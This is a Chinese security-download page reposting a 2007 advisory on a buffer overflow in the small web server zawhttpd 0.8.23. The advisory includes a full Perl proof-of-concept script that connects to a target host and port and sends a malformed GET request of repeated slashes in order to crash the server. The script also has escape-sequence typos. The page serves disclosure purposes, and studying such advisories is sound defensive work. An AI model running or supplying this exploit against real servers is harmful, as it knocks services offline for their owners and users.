| 网站首页 | 模板 | 资料 | 源码 | 工具 | 开发 | 设计 | 安全 | 项目 | 网络 | 图片 | 系统 | 数据库 | 博客 | 会员中心 | 小说 | 
MYFTP 精品资料下载
网络学院
学习资料
源码模版
您现在的位置: 精品下载 >> 安全 >> 网络安全 >> 安全中心正文 用户登录 新用户注册
zawhttpd Buffer Overflow            【字体:
zawhttpd Buffer Overflow
作者:佚名    安全中心来源:不详    点击数:    更新时间:2007-10-10
Summary
"zawhttpd is a small http server."

Improper handling of HTTP headers allows attackers to cause a buffer overflow and execute arbitrary code or crash zawhttpd.
 
Credit:
The information has been provided by Kamil 'K3' Sienicki.
 
 Details
Vulnerable Systems:
 * zawhttpd version 0.8.23

Exploit:
#!/usr/bin/perl
# zawhttpd Buffer Overflow Exploit
# by Kamil 'K3' Sienicki

use IO::Socket;
use strict;

my($socket) = "";

if($socket = IO::Socket::INET->new(
  PeerAddr => $ARGV[0],
  PeerPort => $ARGV[1],
  Proto => "TCP"))
{
  print "Attempting to kill zawhttpd at $ARGV[0]:$ARGV[1] ...";
  print $socket "GET //////////////////// HTTP/1.0/r/n/r/n";
  close($socket);
}
else
{
  print "perl zawhttpd.pl localhost 80 /n";
  print "Cannot connect to $ARGV[0]:$ARGV[1]/n";
}
#EoF
 
安全中心录入:chqnet    责任编辑:chqnet 
  • 上一个安全中心:

  • 下一个安全中心:
  • 最新热点 最新推荐 相关安全中心
    Opera Web浏览器JPEG图像处理…
    Ipswitch WhatsUp Professio…
    Opera Web浏览器样式表属性缓…
    BEA WebLogic Server远程文件…
    Symantec Ghost SQLAnywhere…
    phpBazar File Inclusion
    phpBazar File Inclusion (E…
    AWStats: 跨平台的日志分析工…
    MSDTC Arbitrary Opposite M…
    Implementing EFS in a Wind…
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)